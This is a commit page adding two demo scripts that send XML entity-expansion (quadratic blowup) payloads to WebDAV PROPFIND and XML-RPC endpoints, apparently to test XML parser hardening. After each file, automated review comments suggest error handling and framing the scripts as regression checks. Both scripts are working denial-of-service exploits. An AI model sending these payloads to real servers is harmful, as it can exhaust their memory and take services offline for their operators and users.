
Christian Heimes  committed 9cb6ab6

add demo exploits for webdav and xmlrpc

  • Parent commits 6f66d6e


Files changed (2)

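--- a/other/exploit_webdav.py
+++ b/other/exploit_webdav.py
+#!/usr/bin/python
+"""Demo exploit for WebDAV DoS attack
+
+Author: Christian Heimes
+"""
+import sys
+import base64
+import urlparse
+import httplib
+
+if len(sys.argv) != 2:
+    sys.exit("{} http://user:password@host:port/".format(sys.argv[0]))
+
+url = urlparse.urlparse(sys.argv[1])
+
+xml = """<?xml version='1.0'?>
+<!DOCTYPE bomb [
+<!ENTITY a "VALUE">
+]>
+ <propfind xmlns="DAV:">
+   <prop>QUAD
+    <supported-live-property-set/>
+    <supported-method-set/>
+    </prop>
+</propfind>
+"""
+
+xml = xml.replace("VALUE", "a" * 30000)
+xml = xml.replace("QUAD", "&a;" * 1000)
+
+headers = {
+    "Content-Type": "text/xml",
+    "Content-Length": len(xml),
+    "Depth": 1,
+    }
+
+if url.username:
+    auth = base64.b64encode(":".join((url.username, url.password)))
+    headers["Authorization"] = "Basic %s" % auth
+
+con = httplib.HTTPConnection(url.hostname, int(url.port))
+con.request("PROPFIND", url.path, body=xml, headers=headers)
+res = con.getresponse()
+print(res.read())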
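Review bot: The connection setup at the end of the script never looks at `url.scheme`, so an `https://` URL is still sent through a plain `httplib.HTTPConnection` and the Basic `Authorization` header crosses the network unencrypted. A guard such as `if url.scheme != "http": sys.exit("only http:// URLs are supported")` before the request makes that limit explicit. The same line calls `int(url.port)`, which raises a TypeError when the URL has no port because `url.port` is None; passing `url.port` through unchanged lets httplib apply its default. A username without a password fails the same way in the `":".join(...)` call. The password also arrives on the command line, where it stays in shell history and the process list, so prompting with `getpass.getpass()` would be safer. Finally, the docstring could name the issue class being tested (entity expansion in the request DTD) and state that a server whose parser refuses DTDs should reject the request, so the script reads as a regression check.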

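--- a/other/exploit_xmlrpc.py
+++ b/other/exploit_xmlrpc.py
+#!/usr/bin/python
+"""Demo exploit for XML-RPC DoS attack
+
+Author: Christian Heimes
+"""
+import sys
+import urllib2
+
+if len(sys.argv) != 2:
+    sys.exit("{} url".format(sys.argv[0]))
+
+url = sys.argv[1]
+
+xml = """<?xml version='1.0'?>
+<!DOCTYPE bomb [
+<!ENTITY a "VALUE">
+]>
+<methodCall>
+<methodName>system.methodSignature</methodName>
+<params>
+<param>
+<value><string>QUAD</string></value>
+</param>
+</params>
+</methodCall>
+"""
+
+xml = xml.replace("VALUE", "a" * 100000)
+xml = xml.replace("QUAD", "&a;" * 1000)
+
+headers = {"Content-Type": "text/xml", "Content-Length": len(xml)}
+
+req = urllib2.Request(url, data=xml, headers=headers)
+
+print("Sending request to {}".format(url))
+
+resp = urllib2.urlopen(req)
+
+print("Response")
+print(resp.read())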
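Review bot: The `urllib2.urlopen(req)` call near the end has no error handling, so a server that rejects the DTD with an HTTP error status surfaces as an uncaught `urllib2.HTTPError` traceback. That means the mitigated outcome, the one a defender most wants to confirm, is the hardest to read. Wrapping the call in `try:` with `except urllib2.HTTPError as err: print("HTTP {}: {}".format(err.code, err.read()))` would report it cleanly. The call also sets no timeout, so the script can block indefinitely if the endpoint stops answering; `urllib2.urlopen(req, timeout=30)` bounds that. The docstring could say that the payload relies on entity expansion and that a hardened endpoint should return a fault or error rather than process the document.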